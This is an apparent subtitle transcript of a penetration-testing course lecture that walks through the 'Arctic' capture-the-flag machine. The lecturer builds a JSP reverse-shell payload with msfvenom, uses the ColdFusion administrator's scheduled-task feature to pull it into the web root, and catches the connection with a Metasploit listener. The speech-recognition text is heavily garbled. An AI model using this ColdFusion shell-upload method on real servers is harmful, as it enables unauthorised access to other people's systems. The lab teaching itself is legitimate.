1
00:00:00,570 --> 00:00:08,040
Hi, within this lecture, we're going to try and find a way in order to upload a shell or any kind

2
00:00:08,040 --> 00:00:16,950
of way to send a reverse shell back to our clinics with inside of the cold fusion administrator panel

3
00:00:16,950 --> 00:00:17,510
over here.

4
00:00:17,520 --> 00:00:26,780
OK, so I don't think that you ever use cold fusion before, but if you do, then you can actually find

5
00:00:26,780 --> 00:00:27,860
this very easy.

6
00:00:28,230 --> 00:00:36,600
But when I first saw this ETF, I haven't used any kind of cold fusion products before, so I'm going

7
00:00:36,600 --> 00:00:39,300
to exactly show you how I found this out.

8
00:00:39,510 --> 00:00:46,710
OK, so first thing I did, I'm going to just open the Google and I have written down how to upload

9
00:00:46,710 --> 00:00:49,050
Shell to cold fusion.

10
00:00:49,080 --> 00:00:52,080
OK, so this is how easy it is.

11
00:00:52,080 --> 00:00:54,260
Or maybe we don't know yet.

12
00:00:54,630 --> 00:00:56,640
Maybe it's easy, maybe it's not.

13
00:00:56,640 --> 00:01:03,030
As you can see, we have one million results over a year, more than one million actually close to two

14
00:01:03,030 --> 00:01:03,510
million.

15
00:01:04,020 --> 00:01:11,270
And we can just try to read these tutorials over here in order to understand how this works.

16
00:01:11,400 --> 00:01:17,310
OK, because if you never worked with cold fusion before, then you don't even know the menus.

17
00:01:17,310 --> 00:01:20,700
You don't even know the options.

18
00:01:20,880 --> 00:01:22,380
So you're going to have to cheat a little.

19
00:01:22,380 --> 00:01:32,270
But of course, you don't want to just open the, I don't know, the Arctic CTF solution like this.

20
00:01:32,280 --> 00:01:35,340
OK, so this is the Arctic right up, for example.

21
00:01:35,340 --> 00:01:41,860
I have seen this when I first Google it as well, but I haven't opened it because that would be cheating.

22
00:01:42,270 --> 00:01:46,290
OK, but you can actually read the other ones.

23
00:01:46,560 --> 00:01:50,790
Like over here we see that it's Shell that GSB.

24
00:01:50,790 --> 00:01:55,770
So it should be in the JSB format most of the time, I believe.

25
00:01:56,310 --> 00:02:04,020
And let's see if we have to upload file to cold fusion and let's see if we can find something about

26
00:02:04,020 --> 00:02:04,470
this.

27
00:02:04,920 --> 00:02:09,330
OK, because we can create a JSP easily with MSF Wynnum.

28
00:02:09,570 --> 00:02:17,760
So I'm just going to search for like that how to download files from cold fusion and see if we can actually

29
00:02:17,760 --> 00:02:24,540
make a request, because cold fusion is a web application development portal, some kind of software

30
00:02:24,540 --> 00:02:25,170
eventually.

31
00:02:25,170 --> 00:02:28,800
And there that should be a way to download files.

32
00:02:29,220 --> 00:02:29,720
Right.

33
00:02:30,060 --> 00:02:33,620
So as you can see, we have the stack overflow over here.

34
00:02:34,080 --> 00:02:42,120
And yeah, I believe we can write some functions inside of the cold fusion administrator panel over

35
00:02:42,120 --> 00:02:42,570
here.

36
00:02:43,440 --> 00:02:53,340
So maybe we can try to find this schedule tasks as we see over there and try to see what it does.

37
00:02:53,380 --> 00:02:55,350
OK, let me go over here.

38
00:02:58,030 --> 00:03:01,430
And of course, we're going to have to wait a little bit, as usual.

39
00:03:01,750 --> 00:03:08,260
And by the way, it took me much more time to understand that we need to go into the schedule tasks

40
00:03:08,590 --> 00:03:09,000
then.

41
00:03:09,010 --> 00:03:10,490
Did the research OK?

42
00:03:10,510 --> 00:03:12,100
Took me a lot of Googling.

43
00:03:12,370 --> 00:03:19,240
But again, I have found out that if I come over here, I can create a schedule task.

44
00:03:19,540 --> 00:03:27,210
And the schedule task is exactly like a grown job that we do in calisthenics or in Linux usually.

45
00:03:27,520 --> 00:03:35,200
And over here we can create a job like I create a task and we can assign a Eurail to it, apparently.

46
00:03:35,440 --> 00:03:43,690
OK, so if we can assign a URL, we can just download that file and save it to some kind of a file and

47
00:03:43,690 --> 00:03:47,100
folder system inside of the Adobe Cold Fusion.

48
00:03:47,530 --> 00:03:52,540
And that would be great because we can just create a show and upload it over here.

49
00:03:53,080 --> 00:04:00,500
OK, and there's one question in mind, though, how to run that after we save it.

50
00:04:00,970 --> 00:04:05,380
OK, we don't even know that we can write to you earlier here, OK?

51
00:04:05,410 --> 00:04:06,850
That's that is very easy.

52
00:04:06,850 --> 00:04:15,190
We can just put it on our Apache Web server and how to actually save that file and run that file.

53
00:04:15,850 --> 00:04:23,470
OK, so it should be somewhere over here like Sieff slash files or something like that, but we don't

54
00:04:23,470 --> 00:04:23,920
know it.

55
00:04:24,490 --> 00:04:26,120
So how to find that file?

56
00:04:26,140 --> 00:04:29,350
It took me a lot of time to understand that too.

57
00:04:29,650 --> 00:04:32,340
You have to go to the server settings and mappings.

58
00:04:32,890 --> 00:04:38,980
So if you go to mappings, you can see some general information about your cold fusion aid administrator

59
00:04:38,990 --> 00:04:39,630
settings.

60
00:04:40,060 --> 00:04:42,220
OK, and let me show you what I mean.

61
00:04:42,490 --> 00:04:48,050
If you go to the mappings, you will see the logical patterns over here.

62
00:04:48,670 --> 00:04:53,940
So these are the mappings that our cold fusion server uses.

63
00:04:54,190 --> 00:05:02,680
So our director, Pat, is something like this, so called Fusion eight and WW W Root NCF idea.

64
00:05:02,890 --> 00:05:09,610
OK, so of course there is no way of knowing that you have to look at from the mappings so that you

65
00:05:09,610 --> 00:05:11,710
can come to the scheduled tasks.

66
00:05:11,890 --> 00:05:20,050
When you create a schedule task, you can just put that route into your file target and then make it

67
00:05:20,050 --> 00:05:20,460
work.

68
00:05:21,220 --> 00:05:22,660
So I'm going to show you how to do that.

69
00:05:22,660 --> 00:05:29,080
But just let me search for JSB, Rochelle, by the way, to see if we can get a reverse scaled back

70
00:05:29,080 --> 00:05:35,800
from The Apprentice, Munky or something like that from GitHub, or we're going to have to create it

71
00:05:35,800 --> 00:05:36,960
with myself, with them.

72
00:05:37,390 --> 00:05:39,260
So let me see.

73
00:05:40,180 --> 00:05:44,910
So this is the GOP versus GSB and I don't know.

74
00:05:44,920 --> 00:05:46,570
Yeah, it's a backdoor, actually.

75
00:05:46,580 --> 00:05:55,480
Maybe we can try to compile this on our own or just submit it to download it from the cold fusion and

76
00:05:55,480 --> 00:05:58,990
just make it run and get back to us.

77
00:05:59,530 --> 00:06:04,440
Or maybe we can try to do this automatically with MSF them.

78
00:06:04,660 --> 00:06:11,520
Let me see if we have an interpreter session or like a massive Wynnum Jospeh Rachelle's.

79
00:06:11,800 --> 00:06:17,290
I don't think we can get them interpretation of this one, but at least we can get a shellback.

80
00:06:17,290 --> 00:06:17,690
Right.

81
00:06:18,370 --> 00:06:20,760
So let me come over here.

82
00:06:21,400 --> 00:06:21,850
Yeah.

83
00:06:22,730 --> 00:06:23,180
Yep.

84
00:06:23,290 --> 00:06:23,740
Here you go.

85
00:06:23,740 --> 00:06:26,770
We have JSB, Joven, Interpretor Reverse.

86
00:06:26,770 --> 00:06:28,540
DCPI, we have an interpreter.

87
00:06:28,550 --> 00:06:34,270
Well, I don't think we're going to get an interpreter shellback but it's worth a shot here.

88
00:06:34,270 --> 00:06:41,950
You see the comment in order to run this, OK, as you can see, can be found with a quick Googling.

89
00:06:42,250 --> 00:06:49,150
So all you gotta do is just specify the payload over here, which is Java JSB, Shalrie GCP.

90
00:06:49,540 --> 00:06:55,690
And of course, you get have to give the Al-Hussayen Alpert and you're going to have to run to draw

91
00:06:56,020 --> 00:07:00,370
and call it into a file called Sheldon GSB.

92
00:07:00,790 --> 00:07:04,510
So it's the usual way of working with MSF.

93
00:07:04,510 --> 00:07:10,570
Wynnum, I'm going to run this or you can just copy and paste it from Google or you can just follow

94
00:07:10,570 --> 00:07:11,440
along with me.

95
00:07:11,830 --> 00:07:15,610
I'm going to say it must have been the payload option.

96
00:07:15,610 --> 00:07:23,950
Over here is Dash B, Java JSB shall reverse TCP and for the host, I'm going to go for ten, ten,

97
00:07:23,950 --> 00:07:24,830
fourteen, nineteen.

98
00:07:24,850 --> 00:07:26,740
Of course you got have to write your own.

99
00:07:27,070 --> 00:07:29,950
Alpert is far, far, far, far.

100
00:07:29,980 --> 00:07:31,300
It really doesn't matter.

101
00:07:31,660 --> 00:07:41,530
I'm going to want it in a row format and I'm going to just save it under Devar w w w hdmi l and of course

102
00:07:41,530 --> 00:07:44,290
you get enough to give it a name like Sheldon GSB.

103
00:07:44,830 --> 00:07:48,850
OK, and don't forget to add the extension over here as well.

104
00:07:48,850 --> 00:07:51,040
Like did that just be OK.

105
00:07:51,310 --> 00:07:56,680
You don't have to call it shuttle, you can call it anything you want, but make sure you.

106
00:07:56,910 --> 00:08:05,290
The dark GSB at the end, so this will create a JSP Shall for us, and now I'm going to run the service

107
00:08:05,290 --> 00:08:06,700
Apache to start thinking.

108
00:08:06,730 --> 00:08:09,580
So you know John, run my Web server.

109
00:08:10,150 --> 00:08:12,310
Now I'm going to schedule a new task.

110
00:08:12,610 --> 00:08:16,170
Now I can reach that file through my web server.

111
00:08:16,180 --> 00:08:16,500
Right.

112
00:08:16,510 --> 00:08:24,520
So I'm going to specify the path, the URL as my Web server, and also I'm going to specify the path

113
00:08:24,520 --> 00:08:28,100
of the file as the mapping that we have copied.

114
00:08:28,930 --> 00:08:31,330
So remember, we copied the mapping.

115
00:08:32,530 --> 00:08:41,380
OK, so I'm going to call this test and for the URL, I'm going to go for 10, 10, 14, 19 and Shalal

116
00:08:41,380 --> 00:08:42,960
that GSB.

117
00:08:43,030 --> 00:08:44,470
So this is my Web server.

118
00:08:44,500 --> 00:08:46,270
You're going to have to write your own IP.

119
00:08:46,510 --> 00:08:50,920
I don't require any username and password to reach for this.

120
00:08:51,370 --> 00:08:58,990
I'm going to save this to hear the path that we have copied from mappings.

121
00:08:59,230 --> 00:09:04,690
OK, so let me open this one more time because it seems that I've lost that.

122
00:09:05,650 --> 00:09:09,730
This is one of the reasons that we should take notes often.

123
00:09:09,730 --> 00:09:12,070
As you can see, I lost that.

124
00:09:12,550 --> 00:09:14,290
I have to put this one more time.

125
00:09:14,860 --> 00:09:21,290
So let's wait until 10 seconds so that we can copy it and just come over here and pasted.

126
00:09:21,760 --> 00:09:22,690
So here you go.

127
00:09:22,690 --> 00:09:24,440
It's going to be under here.

128
00:09:24,640 --> 00:09:31,780
So, of course, you don't have to take in the C, OK, because it's already in the local for this one.

129
00:09:31,780 --> 00:09:40,500
But since we do that, it can just come over here and save it under the sea itself.

130
00:09:40,900 --> 00:09:46,890
And over here, I'm going to write that JSB so that this file can be saved to here.

131
00:09:47,290 --> 00:09:54,340
So I'm going to submit this and I believe this will be executed for us.

132
00:09:54,340 --> 00:10:00,570
And we can see if we get the file or not by just running this.

133
00:10:00,940 --> 00:10:06,910
OK, if we can actually reach the JSP file, that means that we got the file.

134
00:10:07,990 --> 00:10:14,620
OK, but this is the maybe this is the first time that we are doing this on cold fusion administrator

135
00:10:14,620 --> 00:10:15,070
panel.

136
00:10:15,080 --> 00:10:16,730
So we're going to try and see.

137
00:10:17,350 --> 00:10:24,610
So I'm going to open them up, have over here because I'm going to create a listener for us.

138
00:10:25,630 --> 00:10:26,500
So here you go.

139
00:10:26,500 --> 00:10:28,090
Our task is scheduled.

140
00:10:28,660 --> 00:10:35,620
So I don't think we have given some instructions for scheduling, like around over a minute runs every

141
00:10:35,620 --> 00:10:36,430
10 minutes.

142
00:10:36,730 --> 00:10:38,300
I'm going to see to that as well.

143
00:10:38,680 --> 00:10:41,440
So over here, I'm in the Métis Floyds.

144
00:10:41,830 --> 00:10:49,870
So what I want to do, what I want to do, I want to go into the multimember as usual, and over there

145
00:10:49,870 --> 00:10:52,750
we're going to have to set the payload to JSB.

146
00:10:52,750 --> 00:10:58,360
So let me try and use exploit multiheaded there so I don't have any payload right now.

147
00:10:58,360 --> 00:11:06,480
So I'm going to say show payloads, but I believe it's going to show us a lot of payloads over here.

148
00:11:07,750 --> 00:11:11,500
So let me see if we have one with interpretor.

149
00:11:11,500 --> 00:11:12,690
I don't think so.

150
00:11:13,000 --> 00:11:23,020
So we're just going to use the same old Java JSP But let me just try to see because it said interpretor

151
00:11:23,800 --> 00:11:25,720
already there in the website.

152
00:11:25,990 --> 00:11:31,300
I don't think so, but let me just find it so I don't see it.

153
00:11:32,050 --> 00:11:39,250
If you guys found a way to open an interpreter with that JSP payload, then it's very good.

154
00:11:39,730 --> 00:11:45,230
But I believe we're going to have to go for the university anyway after Java.

155
00:11:45,800 --> 00:11:50,320
OK, and let me just take a look around here.

156
00:11:50,320 --> 00:11:55,090
I really want to read this, so I'm going to search for my interpreter.

157
00:11:55,990 --> 00:12:02,020
Windows GSP shall OK, MSF Council.

158
00:12:02,290 --> 00:12:14,350
So we're going to get a very special back from the JSB file and see if we can make it into the interpretational

159
00:12:14,410 --> 00:12:15,240
or not.

160
00:12:16,330 --> 00:12:26,890
Nope, I don't think so, because even though it says that interpreter shall over here, OK, the payload

161
00:12:26,890 --> 00:12:30,250
is still Java JSP shall reverse TCP.

162
00:12:30,610 --> 00:12:36,850
So I'm just going to go for that, OK, because let's not waste time over here.

163
00:12:36,880 --> 00:12:40,210
It doesn't matter if we get an interpreter shellback or not.

164
00:12:40,750 --> 00:12:44,230
I'm going to set payload to this and I'm going to run the show Upshaw's.

165
00:12:44,500 --> 00:12:48,400
So we're going to have to change that host to ten, ten, fourteen, nineteen.

166
00:12:48,700 --> 00:12:52,870
Alpert's I believe you have already defined it as four four four four.

167
00:12:53,200 --> 00:12:56,350
So I can run this on the background with running expert.

168
00:12:57,490 --> 00:13:05,140
And I'm going to come back here and let me see if we got the JSB file back, so I'm going to run shelter

169
00:13:05,140 --> 00:13:08,700
just beyond that video over here, OK?

170
00:13:09,040 --> 00:13:10,780
And see if we can get this.

171
00:13:11,890 --> 00:13:19,630
And let's see, shall that GSB, of course, we get have to wait 10 seconds in order to make this work.

172
00:13:20,320 --> 00:13:27,210
And it will show us if we got that file, if we got that file, it will open the show and here you go.

173
00:13:27,220 --> 00:13:28,540
I don't think so.

174
00:13:29,200 --> 00:13:30,610
We didn't get it yet.

175
00:13:31,210 --> 00:13:33,460
So we don't have a child back here.

176
00:13:34,060 --> 00:13:36,790
So it says that file not found exceptional.

177
00:13:36,790 --> 00:13:41,980
OK, so maybe we going to have to just take a look at this test one more time.

178
00:13:42,430 --> 00:13:50,680
Maybe we can just click on here like round scheduled task so that it can run it for us because we haven't

179
00:13:50,680 --> 00:13:52,750
specified an interval for this.

180
00:13:53,050 --> 00:13:56,470
Like in a current up, you remember the current tap.

181
00:13:56,860 --> 00:14:02,320
So we have to specify some kind of time frame and we didn't do that over here.

182
00:14:02,320 --> 00:14:08,160
Maybe we going to have to run this manually like that and see if it works or not.

183
00:14:08,680 --> 00:14:14,770
Of course, it will make us wait 10 seconds again before it shows us the results.

184
00:14:15,880 --> 00:14:18,630
So, yep, I believe yeah.

185
00:14:18,640 --> 00:14:21,230
It says that task was completed successfully.

186
00:14:21,670 --> 00:14:23,440
Let's see if we can get this.

187
00:14:23,590 --> 00:14:25,900
OK, let's see if we got this right now.

188
00:14:25,900 --> 00:14:32,260
So CFI Schallert, JSB, let me run this and let's see if we get the shuttle back.

189
00:14:33,100 --> 00:14:38,170
If it doesn't work, of course, we're going to have to just run the scheduled task one more time with

190
00:14:38,170 --> 00:14:39,180
a different setup.

191
00:14:40,660 --> 00:14:44,740
So, again, we're waiting 10 seconds and here you go.

192
00:14:44,740 --> 00:14:48,310
We got the file not found except one more time.

193
00:14:48,880 --> 00:14:55,750
So I believe there are some things that we should consider about the scheduled task itself.

194
00:14:55,750 --> 00:15:00,490
So let me go into the test and we're going to change some parameters.

195
00:15:01,470 --> 00:15:02,550
Let me see.

196
00:15:03,920 --> 00:15:07,710
Of course, we're going to have to wait and see for 10 seconds one more time.

197
00:15:08,130 --> 00:15:10,760
Again, this is not how you do CTF.

198
00:15:11,370 --> 00:15:19,670
So I'm going to go into our e-mail to see, yep, we have the shell that GSB and here you go.

199
00:15:19,680 --> 00:15:21,860
Vaisse the thing over here.

200
00:15:21,870 --> 00:15:28,260
So we're saving it under the right folder and everything seems to be fine.

201
00:15:28,260 --> 00:15:29,580
It's saving in the right folder.

202
00:15:29,580 --> 00:15:30,240
Right name.

203
00:15:30,540 --> 00:15:35,130
So for the frequency we actually specified something without even realizing it.

204
00:15:35,140 --> 00:15:39,080
So it should be one time thingee at some point.

205
00:15:39,300 --> 00:15:42,990
So I'm going to make it daily every maybe one hour.

206
00:15:42,990 --> 00:15:43,710
One minute.

207
00:15:43,750 --> 00:15:50,490
OK, why not make it one minute and make sure just save it, save output to a file as well.

208
00:15:50,850 --> 00:15:52,370
Maybe that was the problem.

209
00:15:52,620 --> 00:15:54,980
So I changed to one minutes.

210
00:15:55,020 --> 00:15:59,710
They every and also I checked the same output file.

211
00:16:00,150 --> 00:16:04,650
OK, so maybe the frequency was the problem.

212
00:16:04,650 --> 00:16:09,310
Maybe saving this output file was the problem we are going to see.

213
00:16:10,050 --> 00:16:10,470
Yup.

214
00:16:10,470 --> 00:16:13,560
It says that you need to enter a valid start time.

215
00:16:14,520 --> 00:16:21,690
OK, I'm going to choose this one more time, but I'm going to leave the same output to a file checked

216
00:16:22,230 --> 00:16:25,200
and we're going to see if that was a problem or not.

217
00:16:25,410 --> 00:16:28,680
OK, let's see if we can make it work.

218
00:16:29,490 --> 00:16:35,630
So if we can make it work, we can always run this from the administrator panel.

219
00:16:35,850 --> 00:16:43,200
I believe you know that play button that we have actually clicked on and it said that test completed

220
00:16:43,200 --> 00:16:44,030
successfully.

221
00:16:44,340 --> 00:16:44,850
Why not?

222
00:16:44,850 --> 00:16:45,450
We do that.

223
00:16:45,450 --> 00:16:47,180
We can just try to do that as well.

224
00:16:47,460 --> 00:16:47,930
Right.

225
00:16:48,240 --> 00:16:53,490
So I'm going to try that as long as we can submit this.

226
00:16:53,640 --> 00:16:54,530
Yeah, here you go.

227
00:16:54,780 --> 00:17:01,740
Now, I can run this by clicking on display button and let's see if we can get back the shot this time.

228
00:17:02,340 --> 00:17:05,700
OK, we're going to have to wait ten seconds.

229
00:17:06,760 --> 00:17:12,140
And then we're going to have to run it from the browser one more time.

230
00:17:12,610 --> 00:17:13,500
And here you go.

231
00:17:13,510 --> 00:17:15,230
Let me just see.

232
00:17:15,260 --> 00:17:16,440
Yep, this is finished.

233
00:17:16,690 --> 00:17:21,910
I'm going to run this and we're going to have to wait 10 seconds to get a response back.

234
00:17:22,240 --> 00:17:30,820
And then if we get this shell that JSB should open a reverse shell back to us, to the Culley machine

235
00:17:30,820 --> 00:17:31,460
over here.

236
00:17:32,080 --> 00:17:34,470
So let's wait until we see.

237
00:17:34,900 --> 00:17:35,500
Here you go.

238
00:17:35,530 --> 00:17:40,360
Now, we don't get an error if we come over here to a listener.

239
00:17:40,390 --> 00:17:41,430
Here you go.

240
00:17:41,800 --> 00:17:43,510
Now we have the shell open.

241
00:17:43,520 --> 00:17:52,000
So I'm going around saying, well, now here you see we have this one and I'm going to just interact

242
00:17:52,000 --> 00:17:52,450
with it.

243
00:17:53,110 --> 00:17:55,570
And let's see what kind of shall we get?

244
00:17:55,840 --> 00:17:57,400
It really doesn't matter.

245
00:17:57,970 --> 00:18:06,040
As long as we get a shell, we can try to escalate our privileges in a way that we can become an administrator

246
00:18:06,040 --> 00:18:10,180
user because we have seen a lot of things about it in the previous section.

247
00:18:10,210 --> 00:18:10,650
Right.

248
00:18:11,260 --> 00:18:16,380
So let me try this with hitting enter or something.

249
00:18:16,840 --> 00:18:17,590
Yeah, here you go.

250
00:18:17,590 --> 00:18:24,440
We have the shell back here, so I'm going to try to find who am I?

251
00:18:24,670 --> 00:18:26,830
Yeah, we are Arctic tolis.

252
00:18:27,460 --> 00:18:29,080
So far so good.

253
00:18:29,500 --> 00:18:32,290
I'm going through our system info and let's see.

254
00:18:32,320 --> 00:18:33,100
Yeah, here you go.

255
00:18:33,100 --> 00:18:35,250
We see all the things over here.

256
00:18:35,260 --> 00:18:36,340
So this is Arctic.

257
00:18:36,340 --> 00:18:40,980
This is window server actually Windows Server 2008.

258
00:18:41,350 --> 00:18:42,070
Very good.

259
00:18:42,460 --> 00:18:43,510
Let's stop here.

260
00:18:43,510 --> 00:18:47,950
And within the next lecture, we can understand how to escalate our privileges together.